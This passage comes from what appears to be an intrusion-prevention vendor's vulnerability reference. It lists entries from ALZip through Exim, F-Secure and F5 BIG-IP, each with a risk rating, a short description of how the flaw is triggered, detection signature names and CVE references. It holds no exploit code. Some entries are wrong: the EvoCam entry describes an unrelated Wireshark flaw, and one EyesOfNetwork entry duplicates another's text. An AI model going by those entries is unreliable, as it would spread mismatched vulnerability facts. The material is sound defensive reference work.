Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ESTSoft ALZip
Type: Buffer Overflow
Description: A code execution vulnerability exists in ESTsoft ALZip product. The vulnerability exists in libETC.dll library and is due to improper processing of the filename or name parameter within MIM file headers which will result in a stack-buffer overflow if an overly long filename is provided. A remote attacker can exploit this vulnerability to execute arbitrary code. A remote unauthenticated attacker could exploit the vulnerability by convincing a user to open a malicious file and execute arbitrary code in the context of the logged in user.
Situation: HTTP_SS-Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
File-Text_Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
References:
CVE-2011-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1336
BID-48493
http://www.securityfocus.com/bid/48493
OSVDB-73684
http://www.osvdb.org/73684
Back to top

Etcd-API-Stored-Keys-Disclosure

About this vulnerability: A vulnerability in Etcd
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Etcd
Type: Insecure Configuration
Description: A vulnerability in Etcd which allows remote attackers to retrieve all stored key values through an API request.
Situation: HTTP_CSU-Etcd-API-Stored-Keys-Disclosure
Back to top

EternalBlue-Probe

About this vulnerability: EternalBlue probing communication
Risk: High
First detected in: sgpkg-ips-905-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An unknown FID reply to an unknown FID SMB Trans request. This behaviour is common in computers vulnerable against MS17-010 exploit.
Situation: SMB-TCP_EternalBlue-Large-Buffer
SMB-TCP_Windows-Named-Pipe-Execution-Status-Unset
SMB-TCP_Known-EternalBlue-Probe-Echo-Reply
SMB-TCP_SHS-EternalBlue-Probe
References:
MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010
Back to top

Ethereal-AFP-Dissector-Format-String

About this vulnerability: Format string vulnerability in Ethereal AFP dissector
Risk: Moderate
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ethereal
Type: Format String
Description: Ethereal is a network packet capturing utility. A format string vulnerability in the Ethereal AFP dissector allows a remote attacker to compromise a system running vulnerable Ethereal by sending a specially crafted packet to the network where the traffic is captured.
Situation: Generic_Ethereal-AFP-Format-String
References:
CVE-2005-2367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2367
BID-14399
http://www.securityfocus.com/bid/14399
Back to top

Ethereal-Multiple-Protocol-Dissector-Buffer-Overflows

About this vulnerability: Multiple buffer overflow vulnerabilities in Ethereal protocol dissectors
Risk: Moderate
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ethereal
Type: Buffer Overflow
Description: Ethereal is a network packet capturing utility. Many protocol dissectors in Ethereal contains buffer overflow vulnerabilities: SIP, CMIP, CMP, CMS, CRMF, ESS, OCSP, X.509, ISIS, DISTCC, FCELS, Q.931, NCP, TCAP, ISUP, MEGACO, PKIX1Explitit, PKIX_Qualified, Presentation. Remote attacker is able to exploit these vulnerabilities to execute arbitrary code with the privileges of the user that activated the vulnerable application.
Situation: Generic_Ethereal-DistCC-BOF
SIP-UDP_CS-Ethereal-SIP-BOF
References:
CVE-2005-1461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1461
BID-13504
http://www.securityfocus.com/bid/13504
Back to top

Ethereal-Multiple-Vulnerabilities

About this vulnerability: Multiple vulnerabilities in Ethereal
Risk: High
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ethereal
Type: Buffer Overflow
Description: Ethereal traffic analyzer prior to version 0.10.3 contains several buffer overflow vulnerabilities that can be exploited to crash the program or to execute arbitrary command on the system with the superuser privileges.
Situation: Generic_UDP-Ethereal-NetFlow-Buffer-Overflow
References:
CVE-2004-0176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0176
BID-9952
http://www.securityfocus.com/bid/9952
OSVDB-6893
http://www.osvdb.org/6893
Back to top

EtterSilent-Malware-Infection-Traffic

About this vulnerability: EtterSilent malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: EtterSilent malware download infrastructure or infection traffic was detected.
Situation: File-Text_Malicious_Redirection_EtterSilent_Detected
Back to top

Eudora-SMTP-Client-BOF

About this vulnerability: Buffer Overflow in Eudora
Risk: Moderate
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Eudora
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Eudora 7.1. A specially crafted SMTP server reply triggers the vulnerability. A successful exploit leads to remote compromise.
Situation: SMTP_Eudora-Server-Reply-Handling-BOF
Back to top

Eudora-Url-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Eudora
Risk: High
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eudora
Type: Buffer Overflow
Description: There is a vulnerability within certain versions of Eudora, an e-mail client released by Qualcomm Corporation, that allows a remote attacker to cause Eudora to terminate upon clicking a malicious link within an e-mail sent by the attacker. It is possible for the remote attacker to execute arbitrary code on the victim's computer.
Situation: File-Text_Eudora-Url-Handling-Buffer-Overflow
References:
BID-10298
http://www.securityfocus.com/bid/10298
Back to top

Euniverse-Perfectnav

About this vulnerability: eUniverse PerfectNav
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: eUniverse PerfectNav
Type: Misconfiguration
Description: eUniverse's PerfectNav is an adware that will open pop-up ads but can also hijac your browser to redirect you to PerfectNav's web page when mistyping a URL.
Situation: HTTP_CSH-Euniverse-Perfectnav
Back to top

Eureka-Email-2.2q-POP3-Buffer-Overflow

About this vulnerability: A Eureka Email 2.2q POP3 Stack Based Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: Eureka Email
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Eureka Email 2.2q which allows remote attackers to execute arbitrary code by sending a long error message.
Situation: POP3_SS-Eureka-Email-2.2q-POP3-Buffer-Overflow
References:
CVE-2009-3837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3837
OSVDB-59262
http://www.osvdb.org/59262
Back to top

Evasion-In-SQL-Injection

About this vulnerability: SQL comment in HTTP request parameter - possible evasion in SQL injection
Risk: Low
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: SQL Injection
Description: An SQL comment has been detected in an HTTP request parameter. This may indicate an evasion in an SQL injection attempt to avoid attack detection.
Situation: HTTP_CRL-Possible-Evasion-In-SQL-Injection
Back to top

Evernote-For-Mac-Embedded-Link-Directory-Traversal

About this vulnerability: A vulnerability in Evernote for Mac
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Evernote for Mac
Type: Directory Traversal
Description: Improper validation of embedded links in notes causes a directory traversal vulnerability in Evernote for Mac. A successful exploit may allow an attacker execute arbitrary code on the target system.
Situation: File-TextId_Evernote-For-Mac-Embedded-Link-Directory-Traversal
References:
CVE-2019-10038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10038
Back to top

EvoLogical-EvoCam-Web-Server-Buffer-Overflow

About this vulnerability: EvoLogical EvoCam Web Server Buffer Overflow
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: EvoCam Web Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability Wireshark version 3.6.6 and 3.6.7 which allows remote attackers to execute arbitrary code via a long GET request.
Situation: HTTP_CSU-EvoLogical-EvoCam-Web-Server-Buffer-Overflow
References:
CVE-2010-2309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2309
BID-40489
http://www.securityfocus.com/bid/40489
OSVDB-65043
http://www.osvdb.org/65043
Back to top

Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272

About this vulnerability: An attempt to exploit vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Input Validation
Description: Vulnerability in Microsoft Excel
Situation: HTTP_SS-Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
File-OLE_Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
References:
CVE-2011-1272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1272
BID-48157
http://www.securityfocus.com/bid/48157
MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045
Back to top

Excel-Memory-Corruption-CVE-2010-0823

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-312-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Excel-Memory-Corruption-CVE-2010-0823
HTTP_SS-Excel-Memory-Corruption-CVE-2010-0823
File-OLE_Excel-Memory-Corruption-CVE-2010-0823
References:
CVE-2010-0823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0823
OSVDB-65233
http://www.osvdb.org/65233
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Exchange-DoS-MS03-046

About this vulnerability: Microsoft Exchange Server Denial of Service (MS03-046)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 2000; Exchange Server 5.5
Type: Input Validation
Description: Microsoft Exchange Server can be requested to receive a binary file. This special extended verb request defines the file size, allowing the attacker to request for huge files thus causing memory allocation to fail. In addition, aspecially crafted packet may cause a buffer overflow in Exchange Server 2000, that could potentially compromise the system.
Situation: SMTP_Exchange-DoS-MS03-051
References:
CVE-2003-0714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0714
BID-8838
http://www.securityfocus.com/bid/8838
MS03-046
http://technet.microsoft.com/security/bulletin/MS03-046
Back to top

Executable-File-In-Document

About this vulnerability: Arbitary executable file transfer
Risk: High
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: An executable file was found inside a document file. This is uncommon and may indicate that document is or contains malware.
Situation: HTTP_Executable-File-Within-Downloaded-MS-OLE
File-OLE_Embedded-Executable-File
Back to top

Executable-File-Transfer

About this vulnerability: Arbitary executable file transfer
Risk: Low
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Arbitrary executable file transfer across untrusted networks may expose the system to malware infection or indicate such infection under some conditions.
Situation: Shared_Executable-File-Upload
Shared_Executable-File-Download
Shared_ELF-Executable-File-Download
Shared-UDP_Executable-File-Transfer
E-Mail_BS-Executable-File-Transfer
FTP_DL-Executable-File-Download
FTP_UL-Executable-File-Upload
SMB-TCP_FR-Executable-File-Read
SMB-TCP_FW-Executable-File-Write
TFTP_CS-Executable-File-Upload
TFTP_SS-Executable-File-Download
File-Exe_Executable-File-Download
File-Exe_Executable-File-Upload
File-Exe_Executable-File-Transfer
File-Zip_Executable-In-JAR
File-Zip_Executable-In-Archive
File-Exe_Executable-In-Archive
File-Binary_ELF-Executable-File-Transfer
File-Binary_Mach-O-Executable-File-Transfer
Back to top

Executable_Disguised_As_Image_File

About this vulnerability: Executable disguised as an image file was detected
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An executable with an image file extension was detected. Malicious actors may disguise their executable files using this technique to bypass detection.
Situation: File-Exe_Executable_Disguised_As_Image_File
Back to top

Exiftool-DjVu-Remote-Code-Execution

About this vulnerability: A vulnerability in ExifTool Project ExifTool
Risk: High
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1402-5242
Platform: Generic
Software: ExifTool; GitLab
Type: Input Validation
Description: An arbitrary code execution vulnerability has have been reported in the DjVu module of ExifTool. The vulnerability is due to unsafe evaluation and improper parsing of annotation strings. A remote attacker can exploit this vulnerability by having ExifTool process a maliciously crafted DjVu file. Successful exploitation could result in the execution of arbitrary code under the security context of the user running ExifTool. This situation also covers CVE-2021-22205.
Situation: File-Binary_Exiftool-DjVu-Remote-Code-Execution
File-Text_Exiftool-DjVu-Remote-Code-Execution
References:
CVE-2021-22204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22204
Back to top

Exim-B64decode-Off-By-One

About this vulnerability: A vulnerability in Exim Project Exim
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Buffer Overflow
Description: Improper buffer size calcuation during base64 decoding causes a buffer overflow vulnerability in Exim. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: SMTP_CS-Exim-B64decode-Off-By-One
References:
CVE-2018-6789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6789
Back to top

Exim-Bdat-Denial-Of-Service

About this vulnerability: A vulnerability in Exim Project Exim
Risk: Moderate
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Resource Starvation
Description: A denial-of-service vulnerability in the Exim message transfer agent can be exploited by a remote, unauthenticated attacker. Successful exploitation could result in denial-of-service conditions.
Situation: SMTP_CS-Exim-Bdat-Denial-Of-Service
References:
CVE-2017-16944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16944
Back to top

Exim-Bdat-Use-After-Free

About this vulnerability: A vulnerability in Exim Project Exim
Risk: Moderate
First detected in: sgpkg-ips-1021-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Malfunction
Description: Improper parsing of SMTP commands causes a use-after-free vulnerability in the Exim server. A successful exploit allows an attacker to run arbitrary code on the target system with the privileges of the server process.
Situation: SMTP_Exim-Bdat-Use-After-Free
References:
CVE-2017-16943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16943
Back to top

Exim-Buffer-Overflows

About this vulnerability: A vulnerability in Exim Project Exim
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Malfunction
Description: There are two vulnerabilities in Exim MTA (Mail Transfer Agent) software. The first vulnerability is in the SMTP sender information verification process. The second vulnerability exists in the header syntax checking of the message body process. Both vulnerabilities allow a remote attacker to cause a stack buffer overflow on the target server. Upon exploitation, both vulnerabilities could lead to remote code execution on the vulnerable Exim server under the privilege of the user account that runs Exim. When the stack buffer is overflowed, the child process serving the remote client will crash and terminate. If the attack email message is carefully crafted, the attacker could gain control of the process and run the arbitrary code in the attacking payload. The actual behaviour of the attack target depends on the content of executed code.
Situation: SMTP_CS-Exim-Buffer-Overflows
References:
CVE-2004-0399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0399
BID-10290
http://www.securityfocus.com/bid/10290
Back to top

Exim-Deliver_Message-Command-Injection

About this vulnerability: A vulnerability in Exim
Risk: Moderate
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Input Validation
Description: There has been reported a command injection vulnerability in Exim. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in arbitrary code execution.
Situation: SMTP_CS-Exim-Deliver_Message-Command-Injection
References:
CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149
Back to top

Exim-DKIM-DNS-Decoding-Buffer-Overflow

About this vulnerability: A vulnerability in Exim Project Exim
Risk: High
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Exim MTA. The vulnerability is due to an error while handling certain DKIM DNS records which can lead to a heap buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the affected system.
Situation: DNS-TCP_Exim-DKIM-DNS-Decoding-Buffer-Overflow
DNS-UDP_Exim-DKIM-DNS-Decoding-Buffer-Overflow
References:
CVE-2012-5671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5671
BID-56285
http://www.securityfocus.com/bid/56285
OSVDB-86616
http://www.osvdb.org/86616
Back to top

Exim-Etrn-SQL-Injection-CVE-2025-26794

About this vulnerability: A vulnerability in Exim Project Exim
Risk: Moderate
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Exim
Type: Input Validation
Description: Improper handling of SMTP commands causes an SQL injection vulnerability in Exim. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: SMTP_Exim-Etrn-SQL-Injection-CVE-2025-26794
References:
CVE-2025-26794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26794
Back to top

Exim-External-Authenticator-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Exim
Risk: High
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Platform: Generic
Software: Exim
Type: Input Validation
Description: An out-of-bounds write vulnerability has been reported for Exim. This vulnerability is due to improper validation of user-supplied data in the external authenticator. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution under the security context of the user running the vulnerable application.
Situation: SMTP_CS-Exim-External-Authenticator-Out-Of-Bounds-Write
References:
CVE-2023-42115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42115
Back to top

Exim-Filename-Header-Misparsing-CVE-2024-39929

About this vulnerability: An attempt to exploit a vulnerability in Exim detected
Risk: High
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Generic
Software: Exim
Type: Input Validation
Description: Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users.
Situation: E-Mail_Exim-Filename-Header-Misparsing-CVE-2024-39929
References:
CVE-2024-39929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39929
Back to top

Exim-Remote-Code-Execution-CVE-2019-15846

About this vulnerability: A vulnerability in Exim
Risk: High
First detected in: sgpkg-ips-1186-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Exim
Type: Malfunction
Description: There exists a remote code execution vulnerability in Exim.
Situation: SMTP_CS-Exim-Remote-Code-Execution-CVE-2019-15846
TLS-SNI_Exim-Remote-Code-Execution-CVE-2019-15846
References:
CVE-2019-15846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15846
Back to top

Exim-String-Format-Remote-Code-Execution

About this vulnerability: A vulnerability in Exim.org Exim4
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Exim MTA (Mail Transfer Agent). The buffer overflow is due to improper handling of email headers, which can lead to remote code execution. Remote attackers can exploit this vulnerability to execute arbitrary code on a vulnerable Exim server by sending a specially crafted email to the vulnerable server. The code is executed in the security context of the affected server.
Situation: SMTP_CS-Exim-String-Format-Remote-Code-Execution
SMTP_CS-Data-Command-Very-Large-Header-Section
References:
CVE-2010-4344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4344
BID-45308
http://www.securityfocus.com/bid/45308
OSVDB-69685
http://www.osvdb.org/69685
Back to top

Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution

About this vulnerability: A vulnerability in Exim Project Exim
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exim
Type: Malfunction
Description: A remote command execution vulnerability exist in Exim MTA that uses the Dovecot as the Local Delivery Agent (LDA). The vulnerability is due to the dangerous configuration in Dovecot suggesting the "use_shell" option. The content of the variable $sender_address can, in most standard setups, be controlled by an attacker, its value is inserted verbatim into the string which is supplied to the shell. This enables attackers to execute arbitrary shell commands within the context of Exim system user. A remote attacker could exploit this vulnerability by sending a malicious 'sender_address' parameter, which is supplied via a 'MAIL FROM' header. Successful exploitation would lead to remote shell commands execution within the context of the Exim user.
Situation: SMTP_Exim-With-Dovecot-Lda-Sender_Address-Parameter-Remote-Command-Execution
References:
OSVDB-93004
http://www.osvdb.org/93004
Back to top

Exorcist-C2-Traffic

About this vulnerability: Exorcist C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Exorcist is a ransomware that targets Windows hosts.
Situation: HTTP_CRH-Exorcist-C2-Traffic
Back to top

Exponent-CMS-Eaascontroller-API-Function-SQL-Injection

About this vulnerability: A vulnerability in exponent CMS
Risk: Moderate
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: exponent CMS
Type: Input Validation
Description: Lack of validation when processing the apikey parameter passed to the api() function causes an SQL injection vulnerability in the Exponent CMS. A successful attack allows an attacker to run arbitrary SQL commands on the target system.
Situation: HTTP_CRL-Exponent-CMS-Eaascontroller-API-Function-SQL-Injection
References:
CVE-2017-7991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7991
Back to top

Extremeware-Event-Log-Telnet-Failure-XSS

About this vulnerability: Cross-Site scripting attack by injecting html scripts into login
Risk: Moderate
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Cross-site Scripting
Description: The Extreme Summit7iTx switch is vulnerable to a cross-site scripting flaw in the Event Log viewer in the web interface. This can be exploited by injecting html scripts into login name via the telnet interface. The login name of the failed login, ie. the script, will be copied into the event log. When the log viewed by a web browser, the attack is executed.
Situation: Telnet_Possible-XSS-Script-In-Login
Back to top

EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654

About this vulnerability: A vulnerability in EyesOfNetwork
Risk: High
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1834-5242
Platform: Linux; Unix
Software: EyesOfNetwork
Type: Input Validation
Description: There exists a vulnerability in EyesOfNetwork, version 5.3 with API version 2.4.2, which allows remote attackers to execute arbitrary commands via the target parameter to autodiscovery.php, CVE-2020-8654. Credentials can be retrieved via SQL injection to the username parameter to getApiKey, CVE-2020-8656.
Situation: HTTP_CRL-EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654
References:
CVE-2020-8654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8654
Back to top

EyesOfNetwork-Hardcoded-API-Key

About this vulnerability: An attempt to exploit a vulnerability in EyesOfNetwork detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: EyesOfNetwork
Type: Malfunction
Description: An attempt to exploit a vulnerability in EyesOfNetwork detected.
References:
CVE-2020-8657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8657
Back to top

EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656

About this vulnerability: A vulnerability in EyesOfNetwork
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Linux; Unix
Software: EyesOfNetwork
Type: SQL Injection
Description: There exists a vulnerability in EyesOfNetwork, version 5.3 with API version 2.4.2, which allows remote attackers to execute arbitrary commands via the target parameter to autodiscovery.php, CVE-2020-8654. Credentials can be retrieved via SQL injection to the username parameter to getApiKey, CVE-2020-8656.
Situation: HTTP_CRL-EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656
References:
CVE-2020-8656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8656
Back to top

EzSoftware-Eznet-Long-HTTP-Request-BOF

About this vulnerability: Buffer overflow in eZ Software ezNet.exe HTTP server
Risk: Moderate
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: eZnetwork eZ
Type: Buffer Overflow
Description: eZnet.exe is vulnerable to a stack-based buffer overflow. A remote attacker can send a long HTTP request to overflow a buffer and possibly execute arbitrary code on the system or cause the system to crash.
Situation: HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-1
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-2
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-3
References:
BID-9167
http://www.securityfocus.com/bid/9167
Back to top

Ezula

About this vulnerability: EZula
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EZula
Type: Misconfiguration
Description: Ezula is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Ezula
Back to top

F-Secure-AntiVirus-Library-Heap-Overflow

About this vulnerability: A vulnerability in F-Secure Anti-Virus
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: F-Secure Anti-Virus; F-Secure Internet Gatekeeper
Type: Malfunction
Description: F-Secure AntiVirus Library is used to parse different file formats to detect malware. Before archive decompression, the library does not properly check the length of certain fields. These fields are copied into a fixed sized heap buffer. As a result, when a file with an overly long filename is processed a heap overflow will occur. This vulnerability can be triggered by an unauthenticated remote attacker, without user interaction, by sending an e-mail containing a crafted ARJ archive file to the target F-Secure AntiVirus Library on client, server, and gateway implementations. Additional attack vectors exist over other common protocols (e.g. HTTP, FTP, POP3), but some may require user interaction. The attacker can execute code of his choice on the target system by triggering the vulnerability. It is possible to create crafted ARJ archives that cause buffer overflow. The attacker can send an e-mail that contains the crafted ARJ archive to the target system. In gateway environments and scheduled scanning on servers, the F-Secure affected Anti-virus products scanned the ARJ archive without user interaction, which causes buffer overflow, so the malicious user is successful in injecting and executing supplied code, and the target system is dependent on the nature and intent of the injected code. Additional attack vectors exist over other common protocols: HTTP, FTP, POP3, etc. Users may download the crafted ARJ archives from malicious websites or receive e-mails attached by crafted ARJ archives on their computer systems installed F-Secure affected Anti-virus products. When the users try to operate the crafted ARJ archives, the F-Secure Anti-virus product will check the ARJ archives, so the attacker can crash the target system or execute code of his choice on the target system.
Situation: File-Binary_F-Secure-AntiVirus-Library-Heap-Overflow
References:
CVE-2005-0350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0350
BID-12515
http://www.securityfocus.com/bid/12515
Back to top

F-Secure-Policy-Manager-Information-Disclosure

About this vulnerability: Information disclosure vulnerability in F-Secure Policy Manager
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: F-Secure Policy Manager
Type: Malfunction
Description: The Management Agent in F-Secure Policy Manager 5.11.2810 allows remote attackers to gain sensitive information, such as the absolute path for the web server, via an HTTP request without any parameters to fsmsh.dll.
Situation: HTTP_CSU-F-Secure-Policy-Manager-Information-Disclosure
References:
CVE-2004-1223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1223
BID-11869
http://www.securityfocus.com/bid/11869
Back to top

F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability

About this vulnerability: A vulnerability in F5 Networks BIG-IP
Risk: High
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1564-5242
Platform: Generic
Software: F5 Networks BIG-IP; F5 Networks Big-IQ
Type: Format String
Description: A format string vulnerability has been reported in the iControl SOAP endpoints of F5 BIG-IP and BIG-IQ. The vulnerability is due to improper handling of requests sent to the web interface. A remote attacker can exploit the vulnerability by sending crafted requests to the target server. Successful exploitation could result in remote code execution within the service of the target server.
Situation: HTTP_CRL-F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability
References:
CVE-2023-22374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22374
Back to top

F5-Big-IP-ASM-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in F5 Big IP
Risk: High
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Malfunction
Description: There exists a stack-based buffer overflow vulnerability in F5 Big IP firmware. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-F5-Big-IP-ASM-Stack-Based-Buffer-Overflow
References:
CVE-2021-22991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22991
Back to top

F5-Big-IP-Dbquery.jsp-SQL-Injection

About this vulnerability: A vulnerability in F5 Networks BIG-IP
Risk: High
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Input Validation
Description: An SQL injection vulnerability has been reported in F5 BIG-IP. The vulnerability is due to improper validation of user input used in SQL queries within the Configuration Utility component. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CRL-F5-Big-IP-Dbquery.jsp-SQL-Injection
References:
CVE-2023-46748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46748
Back to top

F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator

About this vulnerability: A vulnerability in F5 Big-IP's iControl.
Risk: High
